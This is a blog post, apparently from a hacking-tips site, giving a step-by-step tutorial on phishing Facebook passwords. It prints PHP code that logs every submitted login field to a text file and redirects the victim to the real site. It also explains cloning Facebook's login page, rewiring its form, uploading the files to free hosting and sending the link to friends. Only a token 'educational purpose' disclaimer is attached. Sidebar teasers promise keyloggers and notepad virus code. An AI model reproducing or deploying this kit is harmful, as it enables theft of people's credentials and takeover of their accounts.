Skip to main content

How to hack anyone facebook account with easiest way.


Hack Facebook Account with Easiest Way.


Today I am going to discuss some methods that can be used to hack a Facebook account password
 
Today I will cover only way to Hack Facebook Account Password that all hackers usually use to hack your Facebook account.

1. Facebook Phishing Attack(Today's topic).

2. Hacking Facebook account password remotely using Keyloggers.

3. Social Engineering or simply Guessing your friends Password.


                               Facebook Phishing

You need these three Files :
1.phishing.php
2.password.txt
3.facebook.html


1.Phishing.php File :-
  **  Open Notepad and paste the Following code in notepad.



header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

** Save this File With phishing.php


2.Password.txt File
  ** Now, Open notepad again and save it with password.txt


3.Facebook.html File
** Now Goto facebook.com right click on the login page and click on "view source code"


** Select All code then Copy and paste it in another notepad file. And save it as facebook.html

** Now Open Facebook.html in notepad, press ctrl+f and find the following link

https://www.facebook.com/login.php?login_attempt=1

Replace it with phishing.php and close this file after saving.

Now We have 3 Files:-

1) Phishing.php
2) Password.txt
3) Facebook.html


Now You have to upload this three File in any free web Hosting site Like,


** Create an Account and Upload These 3 Files in it.

** Here I am using ooowebhost.com. [Note That after registration on any web hosting site you have to confirm your email id, Open your Email and confirm it, After That you can use your web hosting site, If you are not getting any confirmation mail then check in your Spam]

After Upload 3 File you have to open Facebook.html and you will see Login page of facebook, But it's not Official Site of facebook, it is our fake page [phishing page].

** That it..!! Now You can give the link of facebook.html and give to your friend or you can also test it.

** When you Friend Enter his/her Email Id and Password then it'll store in password.txt [In account of Web Hosting Site]

***Note : Remember this is only for eductional purpose. we are not responsible for it. dont miss use.****

Comments

Popular posts from this blog

About Basic Networking Topology

           Basic Networking Topology This article describes common topologies used for networking. These are a very basic examples, and large networks often use a combination of two or more topologies. Introduction The term "topology" is used to describe the infrastructure of a network. It is a basic map or scheme of how the network is constructed. Viewing the topology of a network is a lot like looking at the map of city. You can see the central points or landmarks. Popular points of the cities are usually surrounded by a dense population of residents. The same is true for computer networks. The popular points (usually servers) are surrounded by residents (client machines) that connect to the server. If you read a networking book about topology, they will probably cover the physical types of topologies like star, ring, bus, and mesh. While these were all commonly used topologies at one point in time, star...

How to hack mozilla firefox brower with in seconds and increase the speed 3X.

Amazing Mozilla Firefox Tips and Tricks To Improving Your Browsing Experience The use of Mozilla Browser is very common browser now a days. Today I  am share some very useful tricks.  Here are some simple tricks which I gathered from different website .    1. THIS IS  SIMPLE TRICK IN MOZILLA FIREFOX WHERE YOU CAN INCREASE YOUR SPEED ITS JUST 3 STEPS FOLLOW THE INSTRUCTION : Step 1:- Type “about:config” into the address bar(URL Bar) of Mozilla firebox and then press enter . And find some code .   Step 2:- Now Alter(changes) the entries as follows:     Set “network.http.pipelining” to “true” then   Set “network.http.proxy.pipelining” to “true”    set “network.http.pipelining.maxrequests” to some number like 29 or 30. This means it will make 29 or 30 requests at once. Step 3:- In the last step right-click anywhere and select New-> Integer . Name it “nglayout....

How to hack anyone System in seconds and Create viruses

G et some knowledge about virus... What is Virus ?  A computer virus is a program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. All computer viruses are man-made. A simple virus that can make a copy of itself over and over again is relatively easy to produce. Even such a simple virus is dangerous because it will quickly use all available memory and bring the system to a halt. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems   Create Virus on Notepad : It is very easy to create a virus on notepad   H ow to open notepad follow these steps 1. P ush win + R then new window will open then type notepad and click on OK . After that notepad will open then type or paste these command and make a virus.   1 -> Virus Creation Tricks 1 Just open the Notepad and type the paste the following Code. set ws=createobje...